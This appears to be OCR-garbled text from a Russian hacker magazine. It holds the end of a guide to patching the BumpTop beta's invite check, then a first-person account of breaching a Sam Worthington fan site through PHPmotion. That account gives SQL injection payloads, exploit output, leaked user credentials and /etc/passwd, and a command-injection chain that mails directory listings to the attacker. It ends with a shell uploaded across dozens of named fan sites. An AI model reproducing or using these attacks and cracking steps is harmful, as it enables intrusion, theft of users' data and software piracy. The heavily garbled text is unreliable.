что я сразу открыл ЬитрГор.ехе в интерактивном дизассемблере ЮА 
рго. После недолгого анализа ЮА замерла, передавая управление 
мне. И тут понеслось. 

Для начала нужно было найти код, который определяет, зарегистрирова- 



на ли программа. Для этого я открыл окно со ЗГгіпдз (5ЫГГ+Р12) и нашел 
там строку «Ріеазе епГег уоиг іпѵіГе собе», написанную в окне для ввода 
инвайта. Кликнул по ней два раза и оказался на адресе . гсіаііа :006470 1 С, 
где эта строка хранится. Затем я вызвал окно щтр Го хгеГ орегапб(х), что- 
бы посмотреть, где наша строка используется. Получил всего один адрес 
и перешел по нему. Далее, чтобы удостовериться, что это тот код, кото- 
рый мы ищем, я поставил точку останова (Р2) и запустил программу (Р9). 
Достигнув бряка, пробежался немного вниз (Р8) до адреса 0041 В7А7. И... 
вот оно! Открылось наше окно с запросом инвайта. Теперь следует найти 
код, который определяет, нужно ли нам показывать это окно. Остановив 
программу и поднявшись по коду выше, до объявления функции по 
адресу .ГехГ:0041 В350, я посмотрел, откуда она вызывается Цитр Го хгеГ 
орегапб]. Затем, перейдя по полученному адресу, сразу перед вызовом 
нашей функции я увидел условный переход: 

. СехГ: : 004862В4 стр ЬуВе рСг [еах+8ВІі] , О 
; сравнение переменной с О 

. ВехВ : 004862ВВ :ІП 2 зГіогС 1ос_4862С2 



► 064 
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ЁигпрТ ор Наг Ьееп зиссеггЫ^ іпгНаІІесІ. 
Оіск Ткве" іо ехіі 




РІеаье иве Ѵ/ітІоіч* Цргіаіа Іо сЬеск Гог опу сяіісаі ирсійез Іо Же .МЕТ Ггатешоік. 



Сапееі | < БасГ [ Оош 

Только что запущенный Витріор Ьеіа 12 




Обновим нашу старую бету на новую? 



; условный переход 

. ЪехЪ : 004862ВБ саіі зиЬ_4ІВ350 ; вызов функции 

Я поставил на него точку останова, запустил программу, и она встала 
на свежеустановленном бряке. Так как здесь условный переход осу- 
ществляется с помощью инструкции М2 (прыгнуть, если не ноль], то, 
чтобы переход все-таки состоялся, нужно поменять флаг 2Е (флаг нуля 

— единственный флаг, который влияет на инструкции М и М2) с 1 на 
0. Поменяв флаг, в окне Оепегаі Ведізіегв я вдавил Рип(к9]. Витріор, 
радостно мигнув сплешскрином и вызвав несколько исключений, 
которые я успешно проигнорировал, стартанул! 

Теперь мне оставалось только сделать битхак файла так, чтобы не 
выводилось окно с запросом инвайта. Открыв файл Ьитрбор.ехе в 
НІЕѴѴ, я два раза пушнул <епІег> для перехода в режим дизассембли- 
рования. Затем нажал Р5, ввел адрес условного перехода (.004862В В] 
и снова нажал <епІег>. 

После РЗ и Р2 для редактирования текущей инструкции я изменил 
текущую инструкцию ЛМЕ на противоположную ей Л (ЛЧЕ/ЧЕ это сино- 
нимы инструкций МЦМ). Все, дело сделано, и теперь мне оставалось 
только сохранить (Е9) и запустить программу! 

Но что это? Сразу после запуска ВитрТор предложил обновить нашу 
старую бету на самую последнюю. Ну что ж, я думаю, не стоит отказы- 
ваться от этого удовольствия. Нажимаем «Уез». 

НИЧЕГО НЕ ПРЕДВЕЩАЛО БЕДЫ 
ИЛИ ВЫМРЮР РЕЮАО.. 

Сразу же после удачного запуска Зй Иезкіюр'а я начал внима- 
тельно изучать все его вкусности, но, к моему удивлению, при- 
мерно через 5-10 минут работы появилось сообщение с пред- 
ложением обновить мою Ьеіа 12 версию ВитрТор'а. «Конечно», 

— подумал я, кликнув на появившемся сообщении кнопку «Уез». 
Программа замерла и через несколько мгновений 30-десктоп 
пропал с экрана моего монитора, и появилось очередное окно с 
запросом инвайта: «АиіЬогігаііоп ба і ІесІ ! Ріеазе епіегуоиг іпѵііе 
собе». Открыв в ЮА обновленный ВитрТор. ехе, я с ухмылкой 
злодея принялся за дело... 




Нужная нам строка 



Аналогично предыдущей версии я нашел по адресу 0068А2СС объ- 
явление строки «АиіЬогігаііоп баііесі !» и место, где она используется 
по адресу 0041 ЕЕ23. После нескольких нажатий <РдІЭр> я увидел объ- 
явление функции, вызывающей форму для ввода инвайта. Нехитрым 
нажатием на клавиатуре <Х> и <Епіег> переместился к месту вызова 
функции; им оказался адрес 0042258С. Затем выделил адрес и по- 
ставил на него бряк. Запустил программу, она остановилась на бряке, 
поменял флаг 2 Е и запустил дальше, тут программа выдала ошибку. 
Что ж, буду искать дальше... 

Я поднялся еще выше — снова до объявления текущей функции — и 
нашел, откуда она вызывается. Это был список из 10 разных адресов. 
Я прошелся по всем ним, расставляя бряки на каждый вызов нашей 
функции, дабы определить из какого места она действительно вызы- 
вается. В очередной раз запустил программу, и теперь она останови- 
лась по адресу 0041 ЕЕ54. Я увидел следующий код: 

. ВехЪ : 0041ЕЕ2Б ВезВ аі , аі 
; условие 

. ВехВ : 0041ЕЕ2Е бпг; 1ос_41ЕЕБ2 /условный переход 

. ЪехЪ : 0041ЕЕ35 ризЪ. есх 
. ВехВ : 0041ЕЕ36 шоѵ есх, езр 
. ЪехЪ : 0041ЕЕ38 шоѵ [езр+0ЕСЪ+ѵаг_С0 ] , езр 
. ВехВ : 0041ЕЕЗС ризЪ. оВВзеВ аАиВІіогігаВіопВ 
; «АиЪйогігаЪіопЕаіІесІ» 

. ВехВ : 0041ЕЕ41 саіі йз : ??0ОЗВгіпд@@<2АЕ@РВВ@2 
. ВехВ : 0041ЕЕ47 Іеа еах, [езр+0Е8й+ѵаг_В0 ] 

. ВехВ : 0041ЕЕ4В ризЪ. еах 

. ВехВ : 0041ЕЕ4С шоѵ [езр+0ЕСЪ+ѵаг_4 ] , 2РЪ. 

. ЪехЪ : 0041ЕЕ54 саіі зиЬ_422550 
; вызов нашей функции 

Действуя по старой схеме, я поставил точку останова на инструкцию 
Л\І2 по адресу 0041 ЕЕ2Е, перезапустил программу и, после успешной 
остановки, поменял флаг 2Е. Все, заработало! Возвратившись в НІЕѴѴ, 
я, как и раньше, поменял инструкцию Л\І2 на М, только теперь по 
адресу 0041 ЕЕ2Е. ВитрТор запустился без проблем, и это была уже не 
12 версия, а новая ВитрТор Веіа 19! 

В итоге я получил последнюю версию программы и удовольствие от 
процесса добычи инвайта. Можно праздновать победу и любоваться 
новым 30 Оезкіор'ом на мониторе железного друга. 

ПОСЛЕСЛОВИЕ ИЛИ СДЕЛАЙ САМ 

В целом продукт функционален и привлекателен, хотя и обладает пока 
различными мелкими глюками, не зря ведь разработчики сохраняют 
за проектом статус закрытой Ьеіа. В последний день сдачи статьи 
разработчики ВитрТор преподнесли сюрприз — вышла новая версия. 
Хорошо это или плохо — решать тебе, т 
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■ ■ Маг і с р 884888, Ьир://5піррег.ги 



Ящи 

Пандоры 

МАССОВЫЙ ВЗЛОМ ИЗВЕСТНЫХ ЗАРУБЕЖНЫХ ФАН-САЙТОВ 



$2.700.000.000 - впечатляющая цифра, не правда ли? Именно столько зеленых 
президентов собрал на сегодняшний день художественный фильм «Аватар». 

За этой суммой кроется не только изнурительная работа лучших специалистов 
мира киноиндустрии, но и «сарафанное радио» многочисленных поклонников синих 
человечков. 



Ф анаты создали множество 

сайтов и блогов, посвященных 
своим кумирам. Одним из са- 
мых успешных проектов такого 
рода является сайт, посвящен- 
ный Сэму Уортингтону — зат-ѵѵогіЫпдІоп. 
пеі . Основанный 8 января сего года, 
ресурс уже сейчас посещают около 30 
тысяч уникальных посетителей в месяц, 
большинство из которых даже и не подо- 
зревают, что их личные данные находятся 
под угрозой :]. 

ПОДГОТОВКА ПЛАЦДАРМА 

Забегая немного вперед, скажу, что одним 
лишь Сэмом Уортингтоном дело не за- 
канчивается. На одной площадке с зат- 
ѵѵогіЫпдІоп.пеІ находятся десятки других 
популярных фан-сайтов, о которых я узнал 
лишь в конце взлома :]. 

Итак, изучение ресурса было начато с 
анализа главной страницы. Наметанный 
глаз поклонника ѴѴогсІРгезз сразу же 
узнал любимый движок, который, к сожа- 
лению, был непробиваемой на тот момент 
версии 2.9.2 (открываем Ыті-исходник 



главной и наблюдаем версию в мета-теге 
Оепегаіог). Этот факт меня особо не огор- 
чил, потому что контент сайта прямо-таки 
манил своим разнообразием. 

Следующий обнаруженный движок 

— «Соррегтіпе Рбоіо Оаііегу» [ загп- 
ѵѵогіЫпдІоп.пеі/даІІегѵ/ ]. Его версия, 
опять же, не смогла меня порадовать 

— Ыті-исходник плюнул в меня надпи- 
сью “< !--Соррегтіпе Рбоіо Оаііегу 1.4.26 
(зІаЫе]-->”. 

Далее, еще немного походив по странич- 
кам ресурса, я наткнулся на интересную 
надпись «Роѵѵегеб ітее Ьу РНРтоЕоп», 
находившуюся внизу странички ѵісіеоз. 
зат-ѵѵогіЫпдІоп.пеЕ Перейдя по пред- 
лагаемой ссылке на хс 

я узнал, что этот движок позиционируется 
как опенсорсный клон ѴоиТиЬе, и что его 
можно бесплатно скачать. 

Завладев исходниками РНРтоІіоп, я сра- 
зу же попытался сравнить версии: мою и 
ту, что находилась на фан-сайте «Джейка 
Салли». Единственной зацепкой, позво- 
лявшей хоть как-то определить версию 
движка, являлась открытая для просмотра 



директория ітадез — в ней находились 
файлы Іодо.діі и Іодо.рпд, на которых от- 
четливо было написано, что необходимая 
мне версия кроется за номером 2.0. Так 
как на официальном сайте РНРтоІіоп 
находилась уже версия 3.0, пришлось не- 
много погуглить (ссылку ищи в сносках]. 
Найдя нужные исходники, я немало 
удивился тому, что там в самом корне при- 
сутствовал файлик ѴЕВЗІОІЧ.ІхІ: с содер- 
жимым «РНРтоІіоп Ѵегзіоп 2 СТАВИЕ - 28 
АРВІЕ 2008». Поскольку такой же файл, 
оказывается, был и на нужном сервере, 
дальше с раскопками кода можно было не 
медлить :]. 

ДЫРЯВЫЙ РНРМОТКШ 

Немного покопавшись в исходниках и 
найдя несколько конструкций вроде сле- 
дующей в ./а и сі і о_зе ІесЕо г. р И р : 

<?рЬр 

$зе1есСог_аис1іо_іс1 = тузр1_геа1_ 

езсаре_зСгіпд ( $_СЕТ [ ' ѵл-СІ' ] ) ; 



► 066 
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[+) Авторизуемся... 

[+)Еухи получены РНРОТ83Ш)^сс«0Те8с23е6ОеОЗЬ59ТбЪ16994Ь<1с2я 

|+] Получаем логин админа. 

І^-] Получаем символ 

0-64-123 

64-96-128 

96-112-123 

Ш-104-Н2 

96-100-104 

96-98-100 

96-97-98 

р-] Символ получен: а 

Е~] Получаем символ #2 

0-64-128 

64-96-128 

96-1 І2- 128 

96-104-112 

96-100-104 

100-102-104 

100 - 101-102 

100 - 100-102 

Н Символ получен: & 



Ыіпсі зді-іпіесііоп эксплойт 
для РНРтоІіоп 



Ніи» | С&пілсі Уз | СіііПІ Агел і Млрг^і уФиг^сіШІ | Т«тв I НіІр^&и№А 



(.без темы) й*адііш« [* 

КоЬсгіу юшу; мне 

гооІ.к:0:0:гооі ; АосгігЛйпЛнпІІ 
Ьіш; ж: 1:1: ЬіпѵЫп:/зЬіп/поіодіо 
йа«пол'и"2:2йаѳппоо7зЬт;^зЬм^поіодіп 

аЛгстсЭ: і *гіт'Лгас/я4т;/зЬіп/п(йодіі? 

Ір:.іс4:7 .Ір:Л«г^зрооІ/1р4:/зЬі<іАпоІодіп 

зупс: х:5Л:*уре:7вЬіп: /Ып/нупс 

ійиШетт: к &.0: еИиі'йочтг/яЬіп с/яЫгДОнЛйонп 

ЬаИ : х;7:С |>э1Е7зЫгт7эЫп/Ьа1[ 

тай: х:&:1 2: таіІ:7уаг/зр401/тэіІ7аЬіп/поІодіп 

пеѵге:я:9: 13:пига;/аК7пв«ге: 

ииер: х: 10 I і ииС р.Лэг/$рдд!Лшср./БЬіг«/паІодіп 

оретзіаг 1:1 1 0. арегаЕаг/івдС^Ьіп/поІодіп 

дат#з: г, 1 2: 100: дагп«:/и^/дате4:/акнп/пд1одіп 

дОрЬег Г. 1 Э;Э0:дСірЬогЛйг7дй|Айг/а(ип/п<і1р5Іп 

Лр:к: 1 4:50:-РТР ІІ4егЛаг/Лр7йЬіп/пп^іп 

пдЮсІу:х:99:90: М^Ьо^у^і/еЬшйГпОЮдіп 

гіЬи4:х:®1 :91:8у$№л те$еадй Ьц$7:/5Ьгаі/лоіодіп 

УСЗа:я:Ѳ9:6О:яі1Ц0Е С0п$4Ій тйтдгу <лиэдг/сЙіг7$ЬІп/п0[*дЬ 

грт х 3?’ -17 : /ѵаг/ІіЬ/фт:/йЫп/пз]од:п 

ЬаМадтрп: лЗДб&НАІ. ^етрп/і/йЬіп/пдІодт 

пеігіитр х:34 34 Нві.ѵогк Сгазй ригпр и&ег:Лаг/сга&Ь:Л]1г7ЬзЕЬ 

ПЗсч); ЙЗ&26: N500 Оадтдпг/ѴзЫпЛіЫддігі 

зэЬ0: х: 74 74 Ргтіеде- зера? зі^-сі 35Н /ѵ-эт/етрЩъьМТ&Ьіги'пйІодіп 

грс:я:Э2-32:Ро4таррег ВРС изег77зЬіп/ео1ддіп 
піаііпиіі х 4747 //аг/зппа1/тииеир7з1мп/по1ддт 

Содержимое /еіс/раззѵѵсі на моем е-таіі 



й А А 1 I 

ѵ ѵ V 4 ■ 



Показать лолрдбные сведения 341 (4 ч назад) +>Отвеппъ 
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[Изображение 



РНРтоІіоп 

Реаіц;еа У іпзіаиаііоп баіѵісе У квдиігетета Гояіт "]( осжпіоаа ^ Е~8ресіаі ояеге Рощв'Тооіа )Ц«еоно8і$ ’)(’ Твтріаіее 




Ѵісіео ЗІіагіпд 

Ѵсшг тетЬегз сап ирІоаО ѵісіео? , айй 
оезсііріюп апй іад-а. Ѵкімз сап аізо ье 
атЬесіоесі оп о Іііег ѵгейзКаз Ю асіа тЬ 
теОіа ..*ее тоге 



Ітаде ОаІІегу 

Арагі Ггот Ьеіпд а ѵШеп зЬагІпд зсгірі, уоиг 
тетЬегз ѵгііі ье аые ш иріоай рісіигез ап 4 
сгааіа ітаде аіЬитз аі«о. А ітаде даііегу ѵі@*ег 
із аізо із иШ Іп. 



ІІрІоасІ Мизіс 

иріоагііпд тизіс а г аиОю 1$ апаНіег оПЬе тапу 
ГеаЕигез, ЬиШ іпіо РНРМоііоп МрЗ аЬагіпд . 
рОоіо зііагіпд, Ыодз.Ше На11$ епоіез®.. Сйеск И 
оиі 







»■»! 

ІІВН 

шіаёі 





Официальный сайт движка РНРтоІіоп 



$зе1есЕог_зд1 = "ЗЕЬЕСТ * ЕКОМ аисііоз ШНЕКЕ 
іпсіехег = $зе1есЕог_аис1іо_іс1 АЖ) арргоѵесі 
= 1 уез ' " ; 



?> 



я, было, обрадовался, но не тут-то было! На запятые 
и прочие “ипіоп зеІесГ в переменной $_Ѳ ЕТ[' ѵі сі ’] 
реагировал банально встроенный в скрипт Ю5, при- 
чем исходники фильтра я посмотреть так и не смог, 
потому что, по всей видимости, он находился в файле 
./сіаззез/сопіід.рбр и был зашифрован утилитой 
рЬрБЫеШ. Оставалось лишь одно — тупая проверка 
всех файлов движка на наличие в них конструкций и 
переменных, на которые фильтр не реагировал. 

После непродолжительного анализа нужная мне уяз- 
вимость была найдена в файле гаіе.рбр: 

<?р]тр 



РНРтоІіоп ѴѴсЫіе* ЗЙсиысаяе 



тузд1_геа1_езсаре_зЕгіпд ( $_СЕТ [ ' гаЕе_іс1' ] ) ; 
$гаЕе_ѵіс1ео_гаЦіпд = 

тузд1_геа1_езсаре_зЕгіпд ( $_СЕТ [ 1 гаЕе ' ] ) ; 

$:Е1ад_зд1 = "ЗЕЬЕСТ * ЕКОМ гаЕіпд ШНЕКЕ 
ѵісіео_ісі = $гаЕе_ѵісіео_і(і АШ изег_ісі = 
$изег_1й" ; 

$Оад_диегу = @тузд1_диегу ( $^1ад_зд1) ; 
$^1ад_соипЕ = @тузд1_пшп_гсжз ( $Е1ад_диегу ) ; 
іі ($^1ад_соипЕ != 0) { 

@шузд1_с1озе ( ) ; 

еггог_гес3.ігесЕ ( 117 ) ; / / "Уои Наѵе аігеасіу 
гаСес! ЕНіз ѵісіео. " 

} 

еізе { 

еггог_гесіігесЕ ( 118 ) ; / / "Уои гедиезС соиісі 
поЕ Ье сошрІеЕесі. " 

} 



гі»Ь 



НИР ://ѴѴѴѴѴѴ 



— і — ■ 

> Ііпкз 

• боѵупІоабз.рЬрто- 
1іоп.сот/Ѵ2/РНРМ0- 
ТІОЫ РНР5.2І І - 
РНРтоІіоп 2.0 

• іоѵѵпіоабз.ріірто- 
Ноп.сот/ѴЗ.О/рЬрб/ 
рЬртоІіоп.гір — 
РНРтоІіоп 3.0 

• зпіррег.ги/ѵіеѵѵ/І 7/ 
рбрто1:іоп-2х- 
гаІербр-Ыіпб-здІ- 
іпіесііоп-ехрІоИ:/ 

— РНРтоІіоп 2.x 
гаіе.рбр Ыіпсі зді 
іпіесііоп ехріоіі 

• ѵѵѵѵѵѵ.рЬрзЫеШ.сот 

— рЬрБЫеШ 




> ѵѵагпіпд 

Все описанное 
в статье является 
плодом больного 
воображения автора. 
Любые совпадения 
с существующими 
сайтами случайны. Ни 
редакция, ни автор не 
несут ответственности 
за любой возможный 
вред, причиненный 
использованием 
материалов этой 
статьи в проти- 
возаконных целях. 



$гаЕе_ѵісІео_іс1 = 
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Еггог - Іііѵаіісі Ьіриі: Беіесіесі 

Ю5 в РНРтоІіоп 

РНРтоііоп Звгѵег А<Мп1Шайоп 



Мешігаіз | 

Асііѵи МатЬега ЗиарегкЫ МетЬегз Мймг тетЬегз Й ргіау) І^ісагеісйсг 




Маладстепі "Пі 



Тогіауг (пеиг) МетЬог Цй 



«ЕйСІ ЕіВЯЙА*Ы*№ 51.ШК ѴМе« 

Г 3 2 С^гі$[у:24 ІЭ:453^9а<12с1Э4Т4э5с8Ѳ7ЬЭса1вс Ь :іі«гс&ігіэп<Лб@1іоі:тэіІ. сот О 

Г 3 2 Іа^[аіІ:йа48Э2Й94бЬ^с94Й20943ГіГаЗС22:іе«Іагі@ Ч я.согп О 

Г 3 2 аІіЬсаі2і:П251794е9сЬОе4?7ѲО вс 0ЬбО(Іс2асЬв:аІ*сэі21@уаЬоо.сот О 

Г 3 2 с^оІіпе123:34веі4с^48217і7се737Б9б2й66іБ4Л:вѵв^Г^@НоМіаіІ-Сот О 

3 2 Ыгіг:=гіЙТЗеве8Ьгіагі4і>4а7Ш(Ігі1321Ьа4йЭ1іпсІбау.'(іга(іеіг§@дтаіІ .сот О 

3 2 заіпэ:Ьб65б04^е73іі9Ье2931аі€Зів(1с52:заіпа7@(пІепа.рі О 

3 2 (іоѵ53Сикіе5;7Ѳ59Э512а1Э36Гв666іѲЬ:е665572есѲ:до-уик@^8сІіог>пв,іР 0 

Г 3 2 Міѵагевт:асЭ1'аЭ07Эіаев^гіа8сгіІ8027І537(Іа:пек:іеІісзііподІі@ІтаІгпаі].іі О 

Г 3 2 ІогсеІусІіѳ:еЗіе9Ьс265€4а6^Гс6й7ЬО?5Ь7б00:саПзке@уаіІіоо сот О 

Г 3 2 ИіаІ«иѳі;ае23а<ісэ«7іѲ4с0і4асЗѲЗз5еОа4Ь.сісЭ:рЬ:а$гг@Коігпаіі.соіп О 

Г 3 2 сЬгіеіів:1$67сЬа555ЁсІва70006ТЬб2153ЬОі1ай^:с^гіаЕіі@ЫосІі.сот.аіі 0 

Г 3 2 кзсКиЬеск:93462е270еае9і2с8(Ю0ШЭаіІаеГ74Ь9.к5сНиЬеьк2О0Ѳ@уа»ісшсот О 

3 2 аі«1 1265:Э66сЗе404сЭТОссйс18Б81сЭ00050:зт1 12Б5@і№ітаі.сат О 

3 2 Гаедгод)іа:ЬаОа452В4а : 97Та8404В8ѳс8Ьс13(с6е:Гв_адіодІіз@І^оіпіаИ.сот О 

3 2 с*гіпкаІап:6і5Э504с939145О5с1ЬЭЭ1'Зс(і1іЭ0с07і:саІІзутіуіЬегд1@дггшІ .сот О 

3 2 !4э^г>сІоРпіеІ'25&сГеЬ7454сО5е034ЭО(2зЬ56Ѳ157«:иізЭ_І(йР@&эр&,р] О 

Г 3 2 МапаизаМаігі)<ѴІЬв:езебіда7гіЭБ4ВДтсее0а6саа703:ауЬіизітоп2@уаор^г О 

3 2 ѲалДИ . е6вЬ262гіРЬ50 1 За еѲЭАЫ В2ВйЭ90гЛ?Э: Вап гііі ѲапйіІісЩтэіІ.ги О 

Г 3 2 НэІбу1383;156828680эсН&$637е281 с7аТ44Э361 ;іімі_ѵегйеіЬеп@ІіоітзіІ сот О 

Логины и пароли пользователей ѵісІео5.5ат-ѵѵогіЫпдІоп.пе1 



ких-либо файлов на системе с помощью 
данного бага не представлялось воз- 
можным), и что Му50І_ сервер фан-сайта 
обладал следующими параметрами: 

изег ( ) - затѵтогѵс!_гісагс1а@ 
ІосаІНюзС 

ѵегзіоп() - 4 . 1 . 22-зкапс1агс1 
сІаДаЬазе ( ) - заггалгогѵс1_ѵіс1ео 

Ничего не оставалось кроме того, как 
более внимательно продолжить изучение 
исходников РНРтоТіоп. 

ГЛУБОКОЕ ПРОНИКНОВЕНИЕ 

На этот раз мое внимание зацепилось 
за файл ./ирІоабеМчпізбесІ.рЬр, который 
отвечает за загрузку и перекодировку 
видео. Смотри сам: 

<?рЬр 



В вышеприведенном коде налицо баналь- 
нейшая ЫіпсІ 5С11_-инъекция: 

ЪРДр : //зіДе . сот/рЬртсЩіоп20/гаДе . 
р1ір?гаЬе_ісі=-9+ог+1 = 1--&га^е=1 - 
Сгие, возвращается хэдер ЬосаДіоп: 
іпсіех . р1ір?сос1е=117 
ЫЩр : / /зіДе . сот/рЬртоЦіоп2 0 /гаке . 
ркр?гаке_іс1=-9+ог+1=2--&гаке=1 
- іаізе, возвращается хэдер 
ЬосаДіоп: іпсіех . ркр?сос1е=118 

Далее необходимо было написать про- 
стейший эксплойт на основе этой инъек- 
ции, что я и сделал (ссылку на сплойт ищи 
в сносках]. 

Эксплойт основан на принципе «бинар- 
ного поиска» и действует по следующей 
схеме: 

1. Логинимся, получаем куку с РНР5Е55Ю; 

2. Получаем поле изегпате из таблицы 
абтіп; 

3. Получаем тбб-хеш пароля админа из 
поля раззѵѵогсі. 

ВНУТРИ 

После нескольких минут работы сплойт 
выдал мне следующие данные: логин 
абтіп и тб5 хеш 2 1 232і297а 57а 5а 743894а 
0е4а80НсЗ. 

Каково же было мое удивление, когда 
после расшифровки на рІа і п-іехі. і піо 
оказалось, что под этим хешем скрывался 
пароль “абтіп” :). 

Но удивляться было некогда, так что я 
залогинился в админку по адресу ѵібеоз. 



запп-ѵѵогТЫпдТоп.пеТ/зЛеабппіп и стал ис- 
кать другие баги. 

Одним из таких багов оказалась более по- 
лезная, чем предыдущая, 50І_-инъекция в 
файле ./зіТеабтіп/тападе.рЬр: 

<?рЬр 

іі ( $_РОЗТ [ 1 зеагсЪ. 1 ] != "") 

{ 

//іі зеагсЪ. 

$Сегш = тузд1_геа1_езсаре_зкгіпд ( 
$_РОЗТ [ 1 зеагсЪ’ ] ) ; 

$гези1к_зд1 = "ЗЕЬЕСТ * РВОМ 
шешЬег_ргоіі1е ѴШЕВЕ изег_ісі = 
$Сегш ОВБЕЕ ВУ изег_пате АЗС ЫМІТ 
$зек_1ітік, $1ішіС"; 

$Ьеас1ег_Ык1е = 1 Тосіауз (пем) 1 ; 

} 

?> 

Используя эту инъекцию, я выудил все 
логины и пароли пользователей системы 
следующим образом: 

-9 ипіоп зеіеск 1,2 ,3,4, 5, 6,7,8, 
9,10 ,11, 12, 13 ,14,15 ,16 ,17, 18, 19, 
20,21,22,23, сопсаС_ѵ73 ( 0х3а,изег_ 
пате , раззілгогсі, етаі1_аскігезз ) ,25,26 
ігот тетЬег_ргоіі1е/* 

Но полезного в них, опять же, ничего не 
было. Добив до конца эту скулю, я узнал, 
что іі!е_ргіѵ у текущего пользователя был 
выключен (так что просмотреть исходники 



$кетр_сііг = $_ВЕС>ІІЕЗТ [ 1 кетр_с1іг 1 ] ; 
// Сек аіі кке розкесі ѵаіиез ігот 
кке .рагат іііе 
$ _РО 3 Т_БАТ А = декРозкБака( 
$кетр_с1іг, $_КЕ0БЕЗТ [ 1 кипр-еіс!’ ] ) ; 

когеасЬ. ( $_РОЗТ_БАТА аз 

$розк_кеу => $розк_ѵа1ие) { 
ік (ргед_такск ( " / А иркі1е_/і " , 
$розк_кеу ) ) { 

$ир1оас!ес1_кі1е_пате = 
$розк_ѵа1ие; 

} 

} 

кипскіоп декРозкБака( 

$ир_с!іг, $ктр_зіс1) { 

$рагатЕі1еЫате = $ир_с!іг . 

$ктр_зіс! . " .рагатз" ; 

$кк = ©кореп ( $рагатРі1еМате , 

' г ' ) ; 

вдМІе ( ! кеок ( $кк) ) { 

$Ъиккег = кдекз ( $кк, 4096); 
1ізк($кеу, $ѵа1ие) = 
ехріосіе ( ' = 1 , кгіт ( $Ъиккег) ) ; 
$ѵаіие = зкг_гер1асе ( 

"~Е()ІіЗ~" , " = " , $ѵа1ие) ; 

$ѵа1ие = зкг_гер1асе ( 

" ~ІШШ~ " , "\г\п", $ѵа1ие) ; 

$рагат_аггау [ $кеу ] = $ѵа1ие; 

} 
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Фан-сайт Сэма Уортингтона 



гекигп $рагаш_аггау ; 

} 

@ехес ( " $ракк_ко_р1ір $сопѵегког $ир1оасіесі_^і1е_пате> / 
беѵ/пиІІ &");// (>/беѵ/пи11 & рагк із ѵЛіак зепбз ко 
Ъаскдгоипб) 

?> 

Здесь скрипт получает параметры Ііепп р_сІ і г и 1:тр_5ІсІ р в которых 
кроется имя файла с некоторыми параметрами для перекодировки 
видео. В этом случае ни один из таких параметров никоим образом не 
проверяется. А теперь, внимание — способ потрошения этого кода :]. 

1. Заливаем на левый сервер зке.сот файл с именем, например, 
{езкМ, в нем пишем следующее: 

иркііе_=кезк .трЗ ; із -Іаітаіі твое_мыло@дтаі1 . 
сот~ЫЖ,Ы~іс1 

2 . Авторизуемся в РНРтобоп; 

3. Переходим по ссылке: ѵѵмѵѵ.ѵібеоз.зат-ѵѵогіЫпдІюп.пеМ 
иріоасіег ЛпізЬесІ.рЬрІіетр сі і г=Ы:1:р ://5І1:е.сот Ае5І:.1:х1:%00 : 

4 . Видим на своем мыле листинг файлов текущей директории 
нашего фан-сайта. 

При выполнении последних пунктов в скрипте происходит следующее: 

1. Переменная $рагатРіІеІ\Іате принимает значение "кккр : //зіке . 
сот/кезк . кхк " (" .рагашз" после нулл-байта отбрасывается); 

2 . ~1\1\Л/1_1\1~ в файле ІезкМ заменяется новой строкой; 

3. Переменная $ирІоасІесІ_Г[Іе_пате берется из ІезкШ; 

4 . Запрос в ехес принимает следующий вид: 

/изг/Ъіп/ркр /Ьоте/зіке/риЪ1іс_]ткт1/р]іртокіоп2 0/ 
сопѵегког . ркр кезк.трЗ;1з -Іаітаіі твое_мыло@дтаіі . 
сот 

ісЗ.> /сіеѵ/пиіі &< 

Как видишь, все гениальное просто :]. Теперь оставалось лишь 
найти директории или файлы, которые были бы открыты на запись, 
но... таковых в текущей директории не оказалось. Так как доволь- 
ствоваться лишь одной админкой видео-раздела фан-сайта Сэма 
я не хотел, нужно было любыми способами залить свой шелл хоть 
куда-нибудь в пределах данного сервера. 

ВЕСЕЛЫЕ СОСЕДИ 

Решив поискать соседей Сэма Уортингтона, я попытался добраться до 



конфигурационного файла Апача ЫірсІ.сопІ 1 (/изг/ІосаІ/арасбе/сопЯ . 
но здесь снова ждала неудача — он был доступен для чтения только 
руту (я же имел жалкие права поЬобу). В данной ситуации мне смог 
помочь только один из «Реѵегзе ІР» сервисов ѵѵѵѵѵѵ.ѵоидеізідпаі. 
сотЛооІзЛ/ѵеЬ-зкез-оп-ѵѵеЬ-зегѵег/ и чтение файла /еіх/раззѵѵсі. 
Как оказалось, на данном сервере хостится великое множество 
видео-подразделений известных фан-сайтов зарубежных звезд. 
Одной из первых открыла объятия для моего шелла Рэйчел 
МакАдамс [ тебіа.гасбеітсабатз.огд ]. Я залил его в доступную 
директорию /Ьоте/гасЬеІтб/риЬІіс_ЬітІ/ирІоасІ5/аѵі и рулил 
множеством фан-сайтов одновременно довольно долгое время. 
Вот список наиболее известных ресурсов этого сервера: 

тесііа . адиііегаѵ\гог1с1. сот — Кристина Агилера 

тесііа . Ыеііап . сот — Джессика Биель 

тесііа . сііѵе-оѵ/еп . огд — Клайв Оуэн 

тебіа . з кітбегіаке . пек — Джастин Тимберлейк 

тесііа . кігзкеп-б. сот — Кирстен Данст 

тесііа . зкіаіаЬеоиі . из — Шайя ЛаБаф 

тесііа . котсгиізекогеѵег . сот — Том Круз 

тесііа . хкііезікаііапкапзіке . пек — Секретные Материалы 

кибе . иікітаке-аѵгіі . сот — Аврил Лавин 

ѵібеоз . а-Ъгобу . пек — Адам Броуди 

ѵібеоз . ЪгабріккчлеЪ . сот — Брэд Питт 

ѵібеоз . з окпкгазіпзкі . пек — Джон Красински 

ѵібеоз . гепе-гиззо . огд — Рене Руссо 

ѵібеоз . кмііідкккап. кап-зікез . огд — Сумерки 

ѵлллѵ.табоппатебіа . кап-зікез . огд — Мадонна 

члллѵ.тебіа . аппекаккачлаукап . сот — Энн Хетеуэй 

ѵллпл.тебіа . скгізкіап-Ъаіе . огд — Кристиан Бэйл 

шяѵі . тесііа . д окппуберр-кап . сот — Джонни Депп 

ѵллм.тебіа.таккбатопкап. огд — Мэтт Деймон 

ѵллм. тесііа. топісаЬеІІиссікап. сот — Моника Белуччи 

ѵтѵі. ѵібеоз . дезз-аіЬа. огд — Джессика Альба 

Немного погуглив по теме, я узнал, что все основные западные 
фан-сайты располагаются на бесплатном хостинге от (ап-зКез. 
огд, один из серверов которого я благополучно поимел :). 

ХЭППИ ЭНД 

Если ты поклонник творчества какой-либо известной лично- 
сти, будь то актер или певец, я думаю, что не стоит открывать 
большое комьюнити, предварительно не позаботившись о его 
безопасности. Миллионы фанов по всему миру общаются и 
обмениваются информацией о своих любимцах на базе уязвимых 
платформ. Так что задумайся: настолько ли необходимо вгонять 
в краску наших общих кумиров из-за нерадивых поклонников? т 
